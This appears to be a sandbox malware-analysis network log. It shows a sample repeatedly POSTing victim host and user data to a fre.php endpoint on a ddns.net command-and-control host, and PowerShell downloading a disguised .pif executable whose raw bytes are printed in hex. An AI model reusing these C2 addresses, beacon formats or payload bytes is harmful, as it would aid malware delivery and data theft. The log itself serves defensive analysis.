                                                        Oct 3, 2024 09:22:36.015475988 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:36.750042915 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:36 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        96192.168.2.116444145.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:36.912101984 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:36.917140007 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:37.777426004 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:37 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        97192.168.2.116444245.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:37.926255941 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:37.931400061 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:38.687633038 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:38 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        98192.168.2.116444345.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:38.831857920 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:38.836711884 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:39.523708105 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:39 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        99192.168.2.116444445.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:39.676918030 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:39.681925058 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:40.350311041 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:39 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        100192.168.2.116444545.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:40.609555960 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:40.614660025 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:41.352128983 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:40 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        101192.168.2.116444645.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:41.552056074 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:41.558182955 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:42.187657118 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:41 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        102192.168.2.116444745.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:42.339214087 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:42.344415903 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:43.088213921 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:42 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        103192.168.2.116444845.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:43.246021032 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:43.251789093 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:43.910703897 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:43 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        104192.168.2.116444945.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:44.062635899 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:44.067473888 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:44.839922905 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:44 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.1149710188.114.96.34434552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-03 07:20:41 UTC196OUTGET /flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif HTTP/1.1
                                                        Host: www.sodiumlaurethsulfatedesyroyer.com
                                                        Connection: Keep-Alive
                                                        2024-10-03 07:20:41 UTC658INHTTP/1.1 200 OK
                                                        Date: Thu, 03 Oct 2024 07:20:41 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 371712
                                                        Connection: close
                                                        Last-Modified: Thu, 03 Oct 2024 07:01:39 GMT
                                                        ETag: "66fe4153-5ac00"
                                                        Accept-Ranges: bytes
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f3hw4SrOTL%2FNS50YCxPQncMHuOUvzoVThUOFMFQJpS1m20QhCuac0Hgv1UMSafPlG55UmAv%2BfKBqW6n2g8M3JXLw25QV0tZGaksYKW2sTWBfzeoOLG39ZxJ%2Buo529C01wTtmKU1u3J6jG4DDLewNBPjLwpl1MBO7"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8ccb2bc998ac41fe-EWR
                                                        2024-10-03 07:20:43 UTC1369INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 51 41 fe 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ac 00 00 00 fc 04 00 00 00 00 00 0a 20 06 00 00 20 05 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELQAf @ @`
                                                        2024-10-03 07:20:43 UTC1369INData Raw: ca 63 ba 8a b1 fb e3 e9 7e d3 60 b1 b1 b6 91 0e 7c 8c 1c bd 1f 93 eb 21 06 51 ba 7b 98 6b 27 fc 87 36 bf 79 f0 48 f5 48 bc a0 ab 12 1d 1a 81 eb d5 1e 12 83 43 65 ec 17 a6 6b 8b a9 c8 93 a4 1b 96 bc 2e fc 8d b3 54 6d 63 0f cc 30 fa d8 fc ce 32 8a c5 65 af 49 d7 c1 0b d5 84 25 85 9a ad 78 73 9e a4 6b 95 32 e1 16 2b a1 d9 ff 20 91 d9 6b 69 f6 43 0f ad 33 a6 83 47 c5 74 70 93 ea 20 33 11 8d fd c8 31 dc 1f 4f 72 78 73 c9 04 25 66 d2 c1 33 d9 72 57 b0 ea 14 e6 a0 16 7e 6d 53 0f 3a 92 8c 23 e3 42 4a cf 14 f7 1d 98 98 bb 0e b3 59 a0 74 77 d6 c2 0d 10 2c 6c c4 d6 20 3a 91 a4 8e c4 05 67 35 6a f6 f4 81 10 dd 41 96 40 be 79 cf 4c 09 bc ea 5e 73 cb 40 30 e6 fa 56 97 00 a3 04 42 48 67 70 51 46 be 24 59 73 56 d7 34 dd 47 be 12 db c3 a7 1d b7 1a 0a 2e fc a7 90 0b bc d7
                                                        Data Ascii: c~`|!Q{k'6yHHCek.Tmc02eI%xsk2+ kiC3Gtp 31Orxs%f3rW~mS:#BJYtw,l :g5jA@yL^s@0VBHgpQF$YsV4G.
                                                        2024-10-03 07:20:43 UTC1369INData Raw: 72 1c ac d0 e9 85 28 86 2f a5 02 c8 5f b6 6c 70 f3 86 51 b2 eb e9 6a 09 b4 1a bd 32 c3 5b 54 49 e6 87 9a f5 49 6f 8a f6 fd f2 5f c0 94 08 f7 d8 48 0e 01 c5 e6 61 03 86 dc 94 53 76 b2 02 fa 58 c9 12 4c 5e 35 b3 ec 47 46 a9 3f 61 57 b7 6b aa d9 cb a7 52 27 ae 77 66 40 77 a7 f5 6f e2 0f f7 8d 36 3e d5 07 cc 1e ae df f8 18 d6 ca 69 b7 81 61 96 87 e3 00 b6 bc 02 06 d3 a2 f9 4d e2 60 7e 5a 39 24 0e 2e 16 62 90 be 14 ec f7 a7 fe db ad fe 57 b0 69 33 7a 8d 6f 03 97 9b 7e bc d0 83 d6 5e 1d 84 eb 9a cf d4 58 bc 13 80 08 16 52 26 f7 b4 9e cd 1e 41 80 32 29 79 3b 60 0b af 8b d7 1c 94 32 67 03 8c 34 3c 15 c4 ca 1a 6b 0c db d1 1c 23 86 6d 9a 51 f7 93 96 20 99 7f 21 b1 7f 70 20 0c 80 69 0a 59 8a cf 20 8b 34 16 f6 76 ec d6 9d 3b f8 32 04 96 ea 64 24 f2 25 91 a3 2e 52 37
                                                        Data Ascii: r(/_lpQj2[TIIo_HaSvXL^5GF?aWkR'wf@wo6>iaM`~Z9$.bWi3zo~^XR&A2)y;`2g4<k#mQ !p iY 4v;2d$%.R7
                                                        2024-10-03 07:20:43 UTC1369INData Raw: 35 29 29 0c 56 42 b0 f5 e8 49 54 1c 9f aa 83 df 95 4c b5 21 31 5a 48 a7 85 38 aa ec a7 0b 3a 78 a7 4d be 14 9a c2 d5 04 32 ad 20 2e c2 65 84 fc 98 ea 33 19 33 75 01 87 34 f7 a9 3d b0 ab fa c2 fe 5a 7e 12 8d 76 3c c9 45 92 7d ce 43 66 61 f0 64 29 7b da 89 d5 09 32 b7 0f 2c f5 22 bf 45 cd 97 49 b3 fc e6 43 0d c3 d6 31 34 b4 cd dc 2e a5 a8 6d a7 a3 06 fa c9 07 d7 c7 ff cd e3 d1 08 64 ca 69 93 89 4c f1 fb 8c 3b b0 f7 47 2a 77 2b 25 30 77 8d 01 3b 76 65 fb 4d 88 3b a2 e4 b0 09 c2 fb 26 e2 ab af fc e5 61 3e b5 e0 c5 f1 1b f9 3d 11 1f f6 50 9e 13 e3 37 0c a1 b8 e1 cd 3d 8f 63 c9 41 17 c3 af a2 3e cf ed ca ab 47 f2 f8 b6 22 9c b5 0e 55 48 24 48 cc 89 9e a9 47 d9 11 a2 83 15 c4 ed 5a 63 55 00 55 78 df 78 b1 46 9c 83 49 c9 4d 83 50 16 35 0f 2f 75 6b 9a 5f bc a2 32
                                                        Data Ascii: 5))VBITL!1ZH8:xM2 .e33u4=Z~v<E}Cfad){2,"EIC14.mdiL;G*w+%0w;veM;&a>=P7=cA>G"UH$HGZcUUxxFIMP5/uk_2
                                                        2024-10-03 07:20:43 UTC58INData Raw: 3f 82 03 0e 15 94 9a 1a 4b ad e0 8b 5e 46 ae 57 90 5b fb 27 b0 e2 c9 55 80 ea f9 29 57 6d d6 c8 44 14 57 42 b2 a0 a5 73 2f 58 1a bc f5 d0 4d 1c 6c a1 c3 1f 1b 58 ac ba 0f 47
                                                        Data Ascii: ?K^FW['U)WmDWBs/XMlXG
                                                        2024-10-03 07:20:43 UTC1369INData Raw: df d1 f4 d8 01 c4 d0 dc 7c 5b c3 46 8f 2c c0 7a b7 b7 98 a8 75 6b 4d 70 cb 53 60 73 c5 cb f7 57 17 82 cb de f0 dc f2 68 27 88 0f c3 04 22 c2 a2 7b 37 17 ee e7 da 66 02 6b d6 4e 2b a9 81 bb 57 b2 2a f9 d5 36 50 84 e1 59 77 cb 2f 92 40 48 3c 67 22 e9 fa d1 c9 92 e0 ae bb 63 ff fb e6 d4 5e 76 1b 50 85 2e b5 6d a4 99 a3 80 27 e4 ac 58 91 27 97 28 82 4a 25 6d b8 43 78 3b 2f dd c5 42 97 d2 e3 a9 a3 ef 5b d8 17 48 30 2d 7d 89 8d 61 71 6a 93 42 dd 94 4a ef 2b ac 1c 61 19 0b d5 b0 af 42 46 be 76 09 f8 ee 77 70 7e 66 0a 9d 75 69 b4 d8 94 b6 92 ad 24 42 a8 69 a5 da 3b c6 f5 49 d9 56 63 94 a2 57 68 64 4c 3a d2 37 ea 61 f4 69 e8 4a 62 db ed dc 15 5e 47 a0 f8 38 e5 19 cc 38 ff a2 ad b9 b8 49 d5 4b 86 a1 a8 7e 29 af 2e 12 75 3a fc 0b 97 e7 54 55 14 69 bd db bd 7c 1b c9
                                                        Data Ascii: |[F,zukMpS`sWh'"{7fkN+W*6PYw/@H<g"c^vP.m'X'(J%mCx;/B[H0-}aqjBJ+aBFvwp~fui$Bi;IVcWhdL:7aiJb^G88IK~).u:TUi|
                                                        2024-10-03 07:20:43 UTC1369INData Raw: 8f 0f 07 56 bc 7d b4 ba 10 88 80 d2 b2 09 ec 36 ac ea d9 d8 ca 3c ce 04 ca c4 41 f0 80 b0 d5 42 f7 c6 a8 1f a9 d1 b5 e9 55 6d 39 78 3f 4e a6 24 73 05 36 62 20 fe be 64 2f b4 ed 94 d6 b8 ae 2f 81 5b 55 fd e0 2a fd 5c 9a 7e 0d 5a fb a1 57 cd da 1e 04 fe c2 40 2e dc 55 92 a5 47 7a 63 91 86 b5 d0 80 c7 18 4d a8 c9 89 10 e2 ce ce c6 36 c7 4c 42 ef d5 c8 50 97 ef 91 48 01 ab f5 1d 38 87 7c 8a ec 8a b2 b0 25 56 9b 07 3c 93 43 26 d6 fd 1b 11 90 af 4f 63 55 c7 9c 30 0b bc f2 ae a7 54 a4 e7 c5 93 f0 22 14 d8 15 c2 13 b8 36 88 45 ef 2c 9b b3 8f a2 32 ee 19 74 d0 61 6f 17 79 96 b5 94 f4 f9 e3 71 d4 8e 09 b3 6c 90 46 4d 9b 05 14 cc e4 27 3e a4 ac b8 61 a3 c2 2c af fb 49 0b 11 50 a1 0e a1 86 bc d2 34 2f 34 ff 7d aa f7 a9 88 f7 35 bd 94 c7 46 7a d8 37 d4 3e e9 9f 72 6a
                                                        Data Ascii: V}6<ABUm9x?N$s6b d//[U*\~ZW@.UGzcM6LBPH8|%V<C&OcU0T"6E,2taoyqlFM'>a,IP4/4}5Fz7>rj
                                                        2024-10-03 07:20:43 UTC1369INData Raw: f9 bf ef fd c2 30 82 01 76 8f 9d be 6d e5 fd ce aa 03 e4 66 48 7d cc d5 ba 8e de 91 13 b3 eb 81 a4 2a 09 00 54 06 ae 3a 99 25 9c 7f 58 5f f0 1b cb 1c f6 f4 52 65 c7 9e e7 d3 3e 2e a9 85 93 ba 22 64 fe 73 f8 5e 19 29 88 6a f9 5e 8a 2c 1b f5 85 93 ed 65 33 16 51 d1 2a c9 7a 75 d8 ad 78 83 2e 5a 6d 87 e4 83 7c 98 dc f0 7b 18 5f 2b 62 8d a4 7b e4 1d 08 75 28 62 59 10 78 9a c1 04 2a 8c 14 90 a5 0a 04 a9 fb ff 27 dd c9 56 1e ff 1b c4 95 ec 72 9e d5 53 61 fd 7a b6 23 bd da f9 3e a1 3d 81 96 df 53 89 a1 f6 68 5c e4 69 df 79 e9 95 46 ab 0f 42 ab 45 3d 54 b0 07 58 fe e2 c3 03 90 7a 74 d7 86 16 55 d6 62 d8 dd 2d b9 cf 5c 40 d8 7e 0f 10 2d ef 24 ee 36 3c 37 51 f3 b8 6c b3 06 db 56 bb 59 cf 14 73 03 83 8c 79 4c 0d 69 e3 6f e9 63 4e 3b 5b 4d ad cb 19 13 8b 4e d3 13 36
                                                        Data Ascii: 0vmfH}*T:%X_Re>."ds^)j^,e3Q*zux.Zm|{_+b{u(bYx*'VrSaz#>=Sh\iyFBE=TXztUb-\@~-$6<7QlVYsyLiocN;[MN6
                                                        2024-10-03 07:20:43 UTC237INData Raw: 9c eb 54 90 59 e1 55 9a 2c bc 53 bf 5b 29 20 aa 59 bb eb fa 71 bb e8 28 cb 1c da 26 57 26 bd 5a 27 f9 93 24 62 f4 48 7f b5 91 ba d6 d9 e3 01 3e af cb fe 62 c4 1d 7a e7 e0 0e da af 08 66 76 86 fd 0c 3b e3 18 64 5b c1 e9 42 73 8d ae 9e e0 0d 23 34 d5 b4 5f 39 5d df c2 17 cb 49 73 dc ea 1b 1d c1 d2 e6 cc f2 a2 7a 4d a9 53 2e 16 5b 79 16 ba ad 8a 4b d3 af d8 b2 5a c7 bc f4 2e 28 d3 ac 3e f9 17 7a 3c 7f bc 3c ff 16 50 22 14 06 a2 90 fd a4 51 f4 0c 3a 6b bd 7f b6 9c 22 91 1c f3 2e 3d 66 07 9f 4c 1e 8c bc 19 29 6f 5f 03 00 6d ee cd db ac 50 3f be 33 b3 04 b4 b4 b9 ea 3a 03 e1 81 94 ef 4f 12 52 2d e3 d1 a2 6f bd 3b e1 97 32 0c 0e 8d 39 8d 0f 54 8f cd ea 6a e1 3d 98 f0 5b 1c 06 64 04 67 23 c2 a4 b9 4d 44 00 fe
                                                        Data Ascii: TYU,S[) Yq(&W&Z'$bH>bzfv;d[Bs#4_9]IszMS.[yKZ.(>z<<P"Q:k".=fL)o_mP?3:OR-o;29Tj=[dg#MD
                                                        2024-10-03 07:20:43 UTC1369INData Raw: e9 0b ce 29 21 fe 5a 1b 8a 8a 20 c4 5b a9 a3 2e 68 1d 66 94 8c ee be 15 3a 54 92 9b d3 ba 31 5a 9a ef 73 bc 1a 0b cc 38 56 75 52 b8 54 bd cd cf e6 d2 e1 8e 84 f9 99 e0 fc b8 65 dc 43 08 0c 90 cf b6 85 c1 78 a2 6f b3 74 4f e9 a5 fe 74 bd af fd 35 cf 4d 8c 5a a6 fb 4a 8b 95 e4 63 48 b9 dd 26 57 bf 10 71 41 43 7e 00 45 d1 fa ee bd 43 03 bb a6 d9 b5 c1 65 c2 aa 33 a1 ca 83 b4 18 e2 51 6f 17 77 dd 23 9d fe b3 59 f6 87 3e d0 be 93 66 31 41 d5 10 a6 c7 b8 0a 31 81 76 66 8b 28 2f 25 fa db 9c 83 fe e7 5d f6 2f 12 d1 9d ee b6 d7 34 7d d5 5b f4 9c 45 23 d6 8f ac ab ea 9a 6b 06 1d 72 5d 81 71 4c 9a 30 97 b2 b5 6b 4e f7 3e 1f d4 bc 5a a8 c6 42 73 ff e8 cf bf 72 e9 db 68 b3 17 5f 0e 84 9f ae f9 bb 71 ac 22 22 c2 f2 74 c2 2c 6d e0 7c 75 25 b0 d0 61 ac 49 5c ef 9d 1b de
                                                        Data Ascii: )!Z [.hf:T1Zs8VuRTeCxotOt5MZJcH&WqAC~ECe3Qow#Y>f1A1vf(/%]/4}[E#kr]qL0kN>ZBsrh_q""t,m|u%aI\


